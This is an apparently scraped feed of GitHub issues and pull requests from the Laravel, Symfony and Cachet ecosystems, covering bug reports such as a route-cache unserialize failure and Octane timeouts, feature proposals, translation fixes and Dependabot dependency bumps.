It should be possible to configure Cachet via a cachet:install Artisan command.

v2.x had an interactive command that would ask you questions and store the configuration.

For v3.x, this won't work exactly the same as we now have a mix of .env and database settings, but the idea is the same.

View more
3 comments
jbrooksuk

jbrooksuk

9th Oct 2024 @ 20:21

Adds the Symfony Flex recipe for symfony/ai-mate, replacing the behaviour previously provided by the symfony/ai-mate-composer-plugin package. Tracking issue: symfony/ai#1994.

Cross-repo PRs

# Repo PR What Status
1 symfony/ai symfony/ai#2027 mate discover --ignore-missing-file open
2 symfony/ai symfony/ai#2026 Drop symfony/ai-mate-composer-plugin from symfony/ai-mate's require list (depends on symfony/ai#2027) draft
3 symfony/flex symfony/flex#1089 Auto-wire @auto-scripts into post-install-cmd / post-update-cmd draft
4 symfony/recipes symfony/recipes#1535 The symfony/ai-mate recipe this PR (draft)
5 symfony/ai follow-up Delete the composer plugin source not started

Summary

  • Registers vendor/bin/mate discover --composer --ignore-missing-file as a composer-scripts entry.
  • Prints the "run vendor/bin/mate init" banner via post-install.txt.
  • Adds a mate alias.

Usage

After composer require symfony/ai-mate, Flex applies the recipe automatically: the discover script is wired into @auto-scripts and runs on every composer install / composer update, and the install banner is shown once.

Marking as draft until symfony/ai#2027, symfony/ai#2026 and symfony/flex#1089 are merged and a Flex release is cut.

View more
1 comment
wachterjohannes

wachterjohannes

3rd May 2026 @ 18:56

needs more info

Laravel Version

v13.19.0

PHP Version

8.5.5

Database Driver & Version

No response

Description

When using first-class callable syntax for route definitions (e.g. (new ContainerController)->show(...)), running php artisan route:cache can produce an __PHP_Incomplete_Class error at runtime for controllers whose action method calls any method on $this.

The chain of failure:

  1. (new SomeController)->show(...) creates a Closure with $this bound to the controller instance.
  2. laravel/serializable-closure v2's ReflectionClosure::isBindingRequired() analyzes the closure body. If the method calls $this->anyMethod(), it returns true, causing the bound controller instance to be serialized into the route cache as a raw PHP object (O:N:"App\...\SomeController":0:{}).
  3. When the route is dispatched, Route::runCallable() deserializes the cached closure using unserialize() with an allowed_classes whitelist that only permits internal serializable-closure classes (SerializableClosure, Native, Signed, SelfReference, UnsignedSerializableClosure).
  4. The controller class is not in the whitelist, so PHP produces __PHP_Incomplete_Class for $this.
  5. Calling any method on $this inside the route action throws a fatal Error.

Critically, this only affects controllers whose action method calls $this->method() — controllers that never reference $this in the action body get "this":N; (null) in the serialized form and are unaffected. This makes the bug appear to affect only specific routes, not all routes.

The error produced:

  Error: The script tried to call a method on an incomplete object.
  Please ensure that the class definition "App\Http\Controllers...\SomeController"
  of the object you are trying to operate on was loaded before unserialize()
  gets called or provide an autoloader to load the class definition

The issue lies at the intersection of two components:

  • laravel/serializable-closure serializes the bound $this object as a raw PHP serialized object, not as a SerializableClosure, so it is subject to the allowed_classes restriction.
  • Route::runCallable() in laravel/framework restricts unserialize() with allowed_classes that does not (and cannot generically) include user-defined controller classes.

A workaround is to ensure the action method never uses the $this token — e.g. by making any helper methods static and calling them via self::. This causes isBindingRequired() to return false and the controller is not serialized.

Steps To Reproduce

  1. Create a controller with a route action that calls a private/public method on $this:
// app/Http/Controllers/FooController.php
class FooController extends Controller
{
    public function show(): string
    {
        return $this->greeting();
    }   
    
    private function greeting(): string
    {
        return 'hello';
    }
}
  1. Register the route using first-class callable syntax:
  // routes/web.php
  Route::get('/foo', (new FooController)->show(...));
  1. Run php artisan route:cache.
  2. Visit /foo.

Expected: Page loads correctly, returns "hello".

Actual: Fatal error: Error: The script tried to call a method on an incomplete object. Please ensure that the class definition "App\Http\Controllers\FooController" of the object you are trying to operate on was loaded before unserialize() gets called.

  1. Run php artisan route:clear — error disappears.
  2. Run php artisan route:cache again — error returns.

Root cause confirmation: inspect bootstrap/cache/routes-v7.php after step 3. You will see:

  "this";O:35:"App\Http\Controllers\FooController":0:{}
  The controller is embedded as a raw PHP serialized object. Change greeting() to static and call it as self::greeting() — after re-caching, the entry becomes "this";N; and the error is gone.
View more
1 comment
chescos

chescos

8th Jul 2026 @ 12:58

Feature Config Status: Needs Review Deprecation
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? yes
Issues -
License MIT

Currently, appending multiple common configuration nodes is not possible without breaking the fluent API. Instead, you first need to store the NodeBuilder in a temporary variable before adding the shared nodes, which makes the configuration less readable.

This PR introduces appendFromCallback(), allowing multiple nodes to be appended through a callback while preserving the fluent interface.

A practical example is the HttpClient configuration, where both the default_options section and each scoped_client share many of the same options:

private function addHttpClientSection(ArrayNodeDefinition $rootNode, callable $enableIfStandalone): void
{
    $rootNode
        ->children()
            ->arrayNode('http_client')
                ->info('HTTP Client configuration')
                ->children()
                    ->arrayNode('default_options')
                        ->children()
                            ->appendFromCallback($this->addCommonHttpClientOptions(...))
                        ->end()
                    ->end()
                    ->arrayNode('scoped_clients', 'scoped_client')
                        ->arrayPrototype()
                            ->children()
                                ->scalarNode('scope')
                                    ->cannotBeEmpty()
                                ->end()
                                ->scalarNode('base_uri')
                                    ->cannotBeEmpty()
                                ->end()
                                ->appendFromCallback($this->addCommonHttpClientOptions(...))
                            ->end()
                        ->end()
                    ->end()
                ->end()
            ->end()
        ->end()
    ;
}

private function addCommonHttpClientOptions(NodeBuilder $builder): void
{
    $builder
        ->integerNode('max_redirects')
            ->info('The maximum number of redirects to follow.')
        ->end()
        ->scalarNode('http_version')
            ->info('The default HTTP version, typically 1.1 or 2.0. Leave to null to automatically negotiate the best version.')
        ->end()
        ->scalarNode('proxy')
            ->info('The URL of the proxy to pass requests through, or null for automatic detection.')
        ->end()
        // ...
        ->append($this->createHttpClientCachingSection())
        ->append($this->createHttpClientRetrySection())
    ;
}
View more
2 comments
HypeMC

HypeMC

11th Jul 2026 @ 17:12

make:security:form-login, when asked to generate unit tests, generate the following line :

        $user = (new User())->setEmail('[email protected]');

It works if the user entity has been generated with the default identifier property ("email"). But if you use another property when using make:form-login (in my case : username), it won't be consistent. And either generates an error, because there is no "email" property. Or, if you added one, makes the test fail, or generates an error, as we try to create a user with an email but without username...

I suggest one (or more) the following :

  • add a comment above this line, saying "Please adjust the following line if your User Entity use another identifier property than Email"
  • outputs the same as a warning on the command line
  • try to detect which property is used as userIdentifier
    • use Reflection to get the body of getUserIdentifier
    • use Reflection to fill in every property of an User object with random, different, values, and check which one is returned by getUserIdentifier
  • ask on the command line the name of the property used as userIdentifier
  • require developer to write a "setUserIdentifier" method in his User class, or allow it and detect its presence with method_exists
View more
Yopai

Yopai

21st Jun 2025 @ 20:22

Form Validator Security Status: Needs Review
Q A
Branch? 6.4
Bug fix? no
New feature? no
Deprecations? no
Issues Fix #51961
License MIT

Finalizes the pending Urdu (ur) translations that were flagged needs-review-translation across three components:

  • src/Symfony/Component/Validator/Resources/translations/validators.ur.xlf (47 strings)
  • src/Symfony/Component/Form/Resources/translations/validators.ur.xlf (1 string)
  • src/Symfony/Component/Security/Core/Resources/translations/security.ur.xlf (1 string)

Each suggestion was reviewed and the needs-review-translation state removed. Where the pre-filled text used "قیمت"/"قدر" for value, it was normalized to "ویلیو" to match the existing reviewed entries in the file (per the "follow the same style/tone" guideline), and the short "This value is not a valid …" messages were aligned with the existing sibling pattern. Placeholders ({{ ... }}, %minutes%) and plural | separators are preserved; <source> entries are untouched.

View more
1 comment
sadiqk2

sadiqk2

13th Jul 2026 @ 05:00

Q A
Branch? 2.x
Bug fix? no
New feature? yes
Deprecations? no
Issues Prerequisite for symfony/ai#1994

When a recipe declares composer-scripts, Flex now also ensures @auto-scripts is wired into scripts.post-install-cmd and scripts.post-update-cmd in the user's composer.json. Restores parity with composer plugins for non-skeleton projects, where these hooks aren't pre-configured.

Cross-repo PRs

# Repo PR What Status
1 symfony/ai symfony/ai#2027 mate discover --ignore-missing-file open
2 symfony/ai symfony/ai#2026 Drop symfony/ai-mate-composer-plugin from symfony/ai-mate's require list (depends on symfony/ai#2027) draft
3 symfony/flex symfony/flex#1089 Auto-wire @auto-scripts into post-install-cmd / post-update-cmd this PR
4 symfony/recipes symfony/recipes#1535 The symfony/ai-mate recipe draft
5 symfony/ai follow-up Delete the composer plugin source not started

Summary

ComposerScriptsConfigurator::configure() now, in addition to merging into scripts.auto-scripts, ensures @auto-scripts is present in both post-install-cmd and post-update-cmd:

  • Hook missing → created as ["@auto-scripts"].
  • Hook is an array without @auto-scripts → appended.
  • Hook is a scalar → converted to array and appended.
  • Hook already contains @auto-scripts → no-op (idempotent).

unconfigure() is intentionally untouched — the wiring stays even when the package is uninstalled, because other recipes may depend on it.

Usage

Recipes can now declare composer-scripts and rely on the script running automatically in any project — including plain PHP projects without the Symfony skeleton's pre-wired hooks.

View more
4 comments
wachterjohannes

wachterjohannes

3rd May 2026 @ 18:56

dependencies javascript

Removes esbuild. It's no longer used after updating ancestor dependencies esbuild, laravel-vite-plugin and vite. These dependencies need to be updated together.

Removes esbuild

Updates laravel-vite-plugin from 2.1.0 to 3.1.0

import { defineConfig } from 'vite'; import laravel from 'laravel-vite-plugin';

export default defineConfig({ plugins: [ laravel({ input: ['resources/css/app.css', 'resources/js/app.js'], refresh: true,

  •       assets: [
    
  •           '../images/**',
    
  •           '../favicons/**',
    
  •       ],
      }),
    
    ], });

Updates vite from 7.3.1 to 8.0.16

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
2 comments
dependabot[bot]

dependabot[bot]

12th Jun 2026 @ 20:22

Perhaps this should go in the Twig issues. I can't figure out how to pass an empty object to a stimulus controller, it keeps getting interpreted as a empty array.

export default class extends Controller {
    static values = {
        languageMap: Object,
// this works
<div {{ stimulus_controller('language', {
        languageMap: {en:'English'}
}> 

// this throws an error: TypeError: expected value of type "object" but instead got value "[]" of type "array"
<div {{ stimulus_controller('language', {
        languageMap: {}
}> 
View more
tacman

tacman

18th Apr 2024 @ 09:56

Hello!

While package managers model like compose, npm, pip, etc. allows to easily set up everything. However, old versions of packages becoming broken with a time, since all these dependencies gets changes (removed, alternated, force-upgraded, etc) and we can't control that.

And so, I attempted to set up the stuff (Just without a docker) using at least latest stable release, but it's now totally broken. I installed PHP 8.2 (that meets the minimum requirements and the last pre-built for CentOS 7 at Remi's repositories), and it just fails to install dependencies, and even more, if --no-script dodges the install problem, the thing is unrunnable at all.

And so, I have a small request for the future: to avoid further cases when dependencies gets forcedly alternated into incompatible things, let's include into releases extra archive that will contain all pre-downloaded dependencies, so it's just need to install PHP of requred version and all the required plugins and modules, the configured web-server, database server, and just run the final thing. Projects like phpBB do that already, they include compose-downloaded packages with their releases, and the setup of the final thing is pretty easy for end users.

I would like to use the Docker container, but in my case, the target machine is pretty weak (a cheap VPS server with 2 GB RAM and 1 CPU), and I should not waste its resources so much to not cause it fail.

View more
Wohlstand

Wohlstand

1st Apr 2026 @ 08:27

Bumps actions/cache from 4 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
1 comment
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 19:32

Greetings,

I'm trying to set up a project using mercure to push events from a symfony API to a react website.

When the user enters his credentials on the login page of my react website, it calls the API which respond in an appropriate way, but also set a mercure cookie like this:

` public function __construct( private RequestStack $requestStack, private Authorization $authorization ) { }

// and further, in a function: $this->authorization->setCookie($request, ['https://example.com/books/1']);`

problem is, I get the following error: Unable to create authorization cookie for a hub on the different second-level domain "192.168.1.43".

why does it tries to use my VM IP as domain, hwile my API actually has a working subdomain/domain name set, as well as TLS activated?

View more
3 comments 👍 1
geoffroyp

geoffroyp

29th Mar 2022 @ 14:23

Octane Version

2.13.1

Laravel Version

12.10.1

PHP Version

8.4.4

What server type are you using?

Swoole

Server Version

6.1.2

Database Driver & Version

No response

Description

Disabling task workers is no longer possible because of this: https://github.com/laravel/octane/commit/4593cec8510694eab56f939f7b17b110a5dfbbbe#diff-4ad62105b4061bfc82e20710d92d0728346c50272b1c5b2995df66f0b570f2dfR71

Steps To Reproduce

php artisan octane:start --workers=2 --task-workers=0

Will create a lot of task workers...

View more
1 comment 👍 1
AnourValar

AnourValar

19th Nov 2025 @ 14:01

View more
2 comments
stoccc

stoccc

13th Feb 2018 @ 10:35

Adds a short "The Package Skeleton" subsection to the introduction of the package development docs, pointing developers to the official skeleton, the installer's laravel package command, and the interactive configuration script that includes only the features you need.

View more
WendellAdriel

WendellAdriel

13th Jul 2026 @ 11:10

Q A
Bug fix? yes
New feature? no
BC breaks? yes
Deprecations? no
Tests pass? -
Fixed tickets https://github.com/symfony/symfony/issues/2376
License MIT
Doc PR

As I notice in https://github.com/symfony/symfony/issues/2376, Acl have memory leak.

This is kind of bad design of code, that use something like this: $this->entry = new Entry(this);

as a result Acl have refcount=2, and second refcount from object itself. As a result when we do unset($acl) it is not free memory at all. This PR - fix for this.

View more
4 comments
ewgRa

ewgRa

10th Sep 2015 @ 19:52

View more
2 comments
chalasr

chalasr

21st Mar 2026 @ 15:39

It would be nice to add support for PHPFranken, what do you think?

View more
7 comments 👍 1
LeikoDmitry

LeikoDmitry

2nd Sep 2025 @ 14:27

Feature

Can you please extend your demo to include common items, like for example:

  • images
  • custom fonts

Thank you

View more
10 comments 👍 7
pculka

pculka

5th Jan 2018 @ 22:32

This PR adds support for Guzzle 8, while maintaining Guzzle 7 support. Guzzle 8 comes with a significant new feature: PHP 8.5+ users with ext-curl installed can have connections shared across php-fpm requests. I've implemented this with the following DX:

// app/Providers/AppServiceProvider.php
use Illuminate\Support\Facades\Http;
use Illuminate\Http\Client\PersistentTransport;

public function boot(): void
{
    Http::globalPersistentTransport(PersistentTransport::Preferred);
}

The PersistentTransport surfaces 3 options:

  • None: Do not try and share connections. This is the current behaviour, and remains the default.
  • Preferred: Try to share connections, but if we are not able to, silently fallback to None.
  • Required: Try to share connections, and if we are not able to, fail loud.

Just looking at the Laravel code, it may look like Laravel is controlling the fallback logic, but that is not the full story. Guzzle also handles falling back


Before this PR can be merged, a few things need to happen:

  • Guzzle 8.0.0 stable needs to be released.
  • The AWS SDK needs to support Guzzle 8.

Follow up activities:

  • Update the Pusher SDK to support Guzzle 8.
  • Update the Resend SDK to support Guzzle 8.
  • Update Laravel first-party packages.
View more
🎉 12 ❤️ 6
GrahamCampbell

GrahamCampbell

29th May 2026 @ 12:03

Feature Status: Needs Review
Q A
Branch? 8.2
Bug fix? no
New feature? yes
Deprecations? no
License MIT

Duplicates the accessibility fixes from #64823 into WebProfilerBundle, since base_js.html.twig/profiler.css.twig must stay in sync with exception.js/exception.css. The rest of this branch follows the exact same ARIA patterns and the same care. Adds full keyboard navigation (ARIA Tree View) to the Forms panel's field tree, and converts a couple of href-less <a> toggles to real <button>s.

View more
Nitram1123

Nitram1123

10th Jul 2026 @ 08:10

Hi everybody.

I have cachet running on docker and when i try to add HTTPS in vhost Nginx using let's encrypt the page cachet broken and don't work.

Someone have a tutorial or way that make it work?

View more
2 comments
fjareta

fjareta

16th Jul 2020 @ 18:23

Hi,

Having just upgraded a project from Symfony 4.4 to 6.4 I found an issue when running the CI pipeline where it was not loading the environment vars from .env.test.

Turns out the bin/console command had not been updated during the upgrade process and the fix was to copy the contents from another Symfony 6.4 project and then require symfony/runtime as instructed.

However, it seems the correct way to do this would have been to run recipes:update however it seems this is missing?

Has this been discontinued? As I it is also missing from a project which started off as a Symfony 6.4 project?

Cheers, S.

Ref: https://symfony.com/blog/fast-smart-flex-recipe-upgrades-with-recipes-update

View more
2 comments
stephen-swsm

stephen-swsm

3rd Jul 2024 @ 09:28

If you have a large number of subscribers after you update the incident to goto them all, the script does this live not in the background which means after you click the "new incident" button you get a very long pause while the script sends all the emails and the script them waits for all the emails to be sent.

Can this not be done in the background as I have had to increase the PHP script timeout to 800 seconds to see if that will allow all the messages to be sent ?

3 minutes 30 seconds in we have only sent 3760 messages out of 10,240 - what is worse is this also needs to send a component update then the incdient email

However I cannot have people waiting 20 minutes after clicking the "new incident" button to get the update all done, then another 20 minutes for each future update.

I have noticed you have large companys using this Cachet - if that is the case have they are repoted waiting upwards to 20 minutes to get a "single" update notification sent ?

View more
6 comments
Artic6

Artic6

5th Jul 2024 @ 09:33

This pull request applies code style fixes from an analysis carried out by StyleCI.


For more information, click here.

View more
ash-jc-allen

ash-jc-allen

14th Jul 2026 @ 08:22

bug

Symfony version(s) affected

7.2.*

Description

I follow the documentation for Mercure https://symfony.com/doc/current/mercure.html I am using using the Docker integration with the Symfony Local Web Server. and $hub->publish($update); provoke an error 500 : [RuntimeException] Failed to send an update. ClientException HTTP/2 405 returned for "https://example.com/.well-known/mercure".

How to reproduce

Create a new symfony webapp project, follow the Mercure documentation until Basic Usage/Publishing

Possible Solution

No response

Additional Context

No response

View more
2 comments
sandbava

sandbava

9th Jan 2025 @ 14:36

enhancement ui

Note: We are not looking for a community member to build this feature, it will be handled a member of the Filament core team when we have availability.

View more
1 comment 🎉 20 👀 1
zepfietje

zepfietje

8th Jun 2024 @ 10:41

I think this passage in config/reference.php is wrong:

 *         channels?: string|array{
 *             type?: scalar|null,
 *             elements?: list<scalar|null>,
 *         },

According to the last line, this should be allowed:

'channels'     => [
    'elements' => [null]
]

but I'm getting:

Monolog configuration error: The logging channel "" assigned to the "filter_for_errors" handler does not exist.

See also https://github.com/symfony/symfony-docs/pull/21626 for a ~related docs PR.

View more
ThomasLandauer

ThomasLandauer

7th Dec 2025 @ 19:22

Status: Needs Review

Directly, the RR package in this PR diff does not support Symfony Kernel by itself, it's not a runtime. However there is Symfony bundle adding runtime with early hints support built-in. Thus, I am not sure, if current link to RR itself can be referenced, or if the bundle supporting RR as runtime that supports these early hints should be referenced instead. If the bundle can actually be referenced in official symfony docs, but wording needs to be adjusted or there are steps to take to allow that, please point me to the right direction if possible.

View more
FluffyDiscord

FluffyDiscord

5th May 2026 @ 17:10

View more
5 comments
abhishek-vasyerp

abhishek-vasyerp

30th May 2024 @ 05:07

Q A
Issues Companion to symfony/ux#3473
License MIT

Companion PR to symfony/ux#3473. Adds the Toolkit/Shadcn docs page for the form recipe.

Kept as draft until symfony/ux#3473 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
Amoifr

Amoifr

18th Apr 2026 @ 14:21

This appears to be related to issue 4403 but a slightly different presentation. We stumbled on this after seeing the [] in the blank tag fields as noted in 4403.

When a user adds a tag to any component in the list then reorders the list it applies the tag to all items. Further even if all rows in the tags and taggables tables are deleted from the database, reordering brings back the tag.

I was able to confirm this on my dev and a production instance along with the 2.4.1 demo instance (https://demo.cachethq.io/).

Steps to Reproduce

  • Add a tag to a component
  • Drag and drop to reorder the component.
View more
3 comments
bwickham01

bwickham01

6th Sep 2024 @ 22:11

more information needed

The status page displays always "1 Incident" after the incident is resolved.

That´s the code status I used:

commit 4ebeba11597f06fc38f30f8ff5992764fb6a2744 (HEAD -> 3.x, origin/HEAD, origin/3.x) Date: Fri Jan 31 08:08:25 2025 +0000

View more
9 comments
tgrymatt

tgrymatt

6th Feb 2025 @ 15:48

View more
👍 1
dkarlovi

dkarlovi

2nd Apr 2026 @ 15:07

note There is no "discussion" enabled on this repo, so I am creating an issue to ask questions.

Question

Is there a way to add multiple controllers directories and import them automatically?

Context

We have an internal reusable bundle to share logic between ours Symfony projects.

Here is the structure:

namespace path
Bundle lib/my-bundle/assets/controllers
App assets/controllers

What should be a good approach

1.In the App controller.json add a way to import other bootstrap.js Like:

  {
      "controllers": [ ],
      "entrypoints": [
          "../lib/my-bundle/assets/bootstrap.js"
      ]
  }

2.Add multiple context when calling a startStimulusApp https://github.com/symfony/stimulus-bridge/blob/d58dc502386573b93cc7442939b4053620ab7966/src/index.ts#L20

What I have tried

Looking at Symfony UX how they import controllers, it uses packages.json. Trying to make it work for our reusable bundle I've ended up like this:

// lib/my-bundle/package.json
{
  "name": "@my-bundle/standard",
  "main": "assets/controllers/controller.js",
  "types": "assets/controllers/controller.d.ts",
  "symfony": {
    "controllers": {
      "user-form": {
        "main": "assets/controllers/user-form_controller.ts",
        "webpackMode": "eager",
        "fetch": "eager",
        "enabled": true
      },
      "other-form": {
        //...
      },
      "another-form": {
        //...
      }
    }
  },
}

Problems

  1. Error at compile, ask to enable TypeScriptLoader or it is already the case

    warning Error loading ./node_modules/@my-bundle/standard/assets/controllers/user-form_controller.ts FIX To process TypeScript files:

    1. Add Encore.enableTypeScriptLoader() to your webpack.config.js file.
  2. We need to declare each controller is this file.

  3. In the app project import each controller inside the controller.json.

  4. We have to declare a main controller and types?

View more
3 comments
cavasinf

cavasinf

15th Sep 2023 @ 09:14

I always have the Symfony dev server symfony server:start -q running in the background during development. However, when I run PHPUnit tests with Panther, it connects to the already running dev server instead of starting its own server. As a result, the tests run in the dev environment instead of the test environment.

Is this the intended behavior? Is there a way to run Panther tests in the test environment while keeping the Symfony dev server running in the dev environment without interference?

Thank you for your help!

View more
👍 1
nacholibre

nacholibre

3rd Dec 2024 @ 12:40

Octane Version

2.13

Laravel Version

12

PHP Version

8.4.17

What server type are you using?

FrankenPHP

Server Version

.

Database Driver & Version

MySQL 9.0.1 DBngin Windows 11

Description

I'm using with WSL

Note I have already modified php.ini

php -i | grep max_execution_timetime max_execution_time => 0 => 0

And stopped php artisan octane:stop

Error :

`php artisan octane:start --host=0.0.0.0 --watch --verbose

   INFO  Server running….  

  Local: http://0.0.0.0:8000 

  Press Ctrl+C to stop the server

   WARN  Caddyfile input is not formatted; run 'caddy fmt --overwrite' to fix inconsistencies.  

   ERROR  PHP Fatal error: Maximum execution time of 30 seconds exceeded in vendor/laravel/framework/src/Illuminate/Foundation/Exceptions/Renderer/Exception.php on line 118.

   ERROR  PHP Fatal error: Maximum execution time of 30 seconds exceeded in vendor/laravel/framework/src/Illuminate/Foundation/Exceptions/Renderer/Exception.php on line 118.`

I have also tried all the following :

Added .env file MAX_EXECUTION_TIME=300

Configure in config/octane.php

phpreturn [
    'server' => env('OCTANE_SERVER', 'frankenphp'),
    
    'max_execution_time' => 300, // Add this line
    
    // ... rest of config
];

Also updated Caddyfile


{
    frankenphp
    order php_server before file_server
}

:8000 {
    php_server {
        max_execution_time 300
    }
}

laravel.log


#0 {main}
"}
[2026-01-27 14:54:01] local.ERROR: Maximum execution time of 30 seconds exceeded {"exception":"[object] (Symfony\\Component\\ErrorHandler\\Error\\FatalError(code: 0): Maximum execution time of 30 seconds exceeded at /mnt/d/Projects/refraapp/backend/vendor/laravel/framework/src/Illuminate/Foundation/Exceptions/Renderer/Exception.php:118)
[stacktrace]
#0 {main}
"}
[2026-01-27 14:54:01] local.ERROR: Maximum execution time of 30 seconds exceeded {"exception":"[object] (Symfony\\Component\\ErrorHandler\\Error\\FatalError(code: 0): Maximum execution time of 30 seconds exceeded at /mnt/d/Projects/refraapp/backend/vendor/laravel/framework/src/Illuminate/Foundation/Exceptions/Renderer/Exception.php:118)
[stacktrace]
#0 {main}
"}

Also did

php artisan config:clear && php artisan cache:clear && php artisan view:clear && php artisan route:clear && php artisan config:cache && php artisan route:cache

Steps To Reproduce

  1. composer require laravel/octane
  2. php artisan octane:install --server=frankenphp
  3. php artisan octane:start --host=0.0.0.0
View more
1 comment
zakblacki

zakblacki

27th Jan 2026 @ 15:30

I'm trying to test out Cachet with docker-compose following this link: https://docs.cachethq.io/docs/get-started-with-docker

so far:

  • last version of cachet (2.3.18) not working since the command called :install does not exists
  • using the version as is in the guide i get this error
cachet_1    | Initializing Cachet database ...
postgres_1  | 2022-05-04 14:46:20.192 UTC [62] ERROR:  relation "chq_settings" does not exist at character 29
postgres_1  | 2022-05-04 14:46:20.192 UTC [62] STATEMENT:  select "name", "value" from "chq_settings"
cachet_1    | PHP Fatal error:  Uncaught ErrorException: count(): Parameter must be an array or an object that implements Countable in /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionIdentifier.php:51
cachet_1    | Stack trace:
cachet_1    | #0 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(2, 'count(): Parame...', '/var/www/html/v...', 51, Array)
cachet_1    | #1 /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionIdentifier.php(51): count(NULL)
cachet_1    | #2 /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionHandlerTrait.php(47): GrahamCampbell\Exceptions\ExceptionIdentifier->identify(Object(ErrorException))
cachet_1    | #3 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(79): GrahamCampbell\Exceptions\ExceptionHandler->report(Object(ErrorException))
cachet_1    | #4 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleException(Object(ErrorException))
cachet_1    | #5 {main}
cachet_1    |   thrown in /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionIdentifier.php on line 51
cachet_1    | PHP Fatal error:  Uncaught ErrorException: count(): Parameter must be an array or an object that implements Countable in /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionIdentifier.php:51
cachet_1    | Stack trace:
cachet_1    | #0 [internal function]: Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(2, 'count(): Parame...', '/var/www/html/v...', 51, Array)
cachet_1    | #1 /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionIdentifier.php(51): count(NULL)
cachet_1    | #2 /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionHandlerTrait.php(47): GrahamCampbell\Exceptions\ExceptionIdentifier->identify(Object(Symfony\Component\Debug\Exception\FatalErrorException))
cachet_1    | #3 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(79): GrahamCampbell\Exceptions\ExceptionHandler->report(Object(Symfony\Component\Debug\Exception\FatalErrorException))
cachet_1    | #4 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(118): Illuminate\Foundation\Bootstrap\HandleExceptions->handleExcep in /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionIdentifier.php on line 51
cachet-docker_cachet_1 exited with code 255

anyone that has an update guide for deploying cachet? is the project mantained?

View more
2 comments
esseti

esseti

4th May 2022 @ 14:49

help wanted
View more
weaverryan

weaverryan

10th Jan 2024 @ 19:05

Sometimes we can have multiple user classes and the index name is then duplicated if we don't change it manually. I added this PR to fix this by prefixing with the class name.

For instance: I have an Admin and User entity that I generated with make:user. The email field is used for this index.

Before: I will then have #[ORM\UniqueConstraint(name: 'UNIQ_IDENTIFIER_EMAIL', fields: ['email'])] for User and Admin entities

After: For the User entity, this will be: #[ORM\UniqueConstraint(name: 'USER_UNIQ_IDENTIFIER_EMAIL', fields: ['email'])]

For the Admin entity, this will be: #[ORM\UniqueConstraint(name: 'ADMIN_UNIQ_IDENTIFIER_EMAIL', fields: ['email'])]

View more
seb-jean

seb-jean

3rd Aug 2025 @ 13:44

Security Status: Needs Review

The access_decision() and access_decision_for_user() Twig functions were only documented in security.rst. This adds them to the Twig Extensions Reference, right after is_granted_for_user() so the security functions stay grouped.

Fix #21788

They were introduced in 7.4: access_decision is absent from SecurityExtension on 7.3 and present on 7.4, hence the base branch and the versionadded directives.

One extra change

While checking the signatures against Symfony\Bridge\Twig\Extension\SecurityExtension, I noticed the second example in security.rst is wrong:

{% set voter_decision = access_decision('post_edit', post, anotherUser) %}

getAccessDecision(mixed $role, mixed $object = null, ?string $field = null) — the third argument is a field name, so passing a user object there raises a TypeError. The surrounding paragraph announces access_decision_for_user() but never shows it, so the example was clearly meant to demonstrate that function. I changed it to:

{% set voter_decision = access_decision_for_user(anotherUser, 'post_edit', post) %}

which matches getAccessDecisionForUser(UserInterface $user, mixed $attribute, mixed $subject = null). Happy to split that into its own PR if you prefer.

View more
2 comments
Amoifr

Amoifr

10th Jul 2026 @ 15:15

Adds compatibility with doctrine/persistence 4

.PHP Fatal error:  Declaration of Symfony\Component\Security\Acl\Domain\Acl::addPropertyChangedListener(Doctrine\Persistence\PropertyChangedListener $listener) must be compatible with Doctrine\Persistence\NotifyPropertyChanged::addPropertyChangedListener(Doctrine\Persistence\PropertyChangedListener $listener): void in /var/www/security-acl/Domain/Acl.php on line 70
......PHP Fatal error:  Declaration of Symfony\Component\Security\Acl\Dbal\MutableAclProvider::propertyChanged($sender, $propertyName, $oldValue, $newValue) must be compatible with Doctrine\Persistence\PropertyChangedListener::propertyChanged(object $sender, string $propertyName, mixed $oldValue, mixed $newValue): void in /var/www/security-acl/Dbal/MutableAclProvider.php on line 169

Q: technically this is a BC break for users who extended those classes + methods since the classes are not @final :thinking: Any other suggestion?

View more
2 comments
dmaicher

dmaicher

3rd Feb 2025 @ 18:42

Hi to everyone,

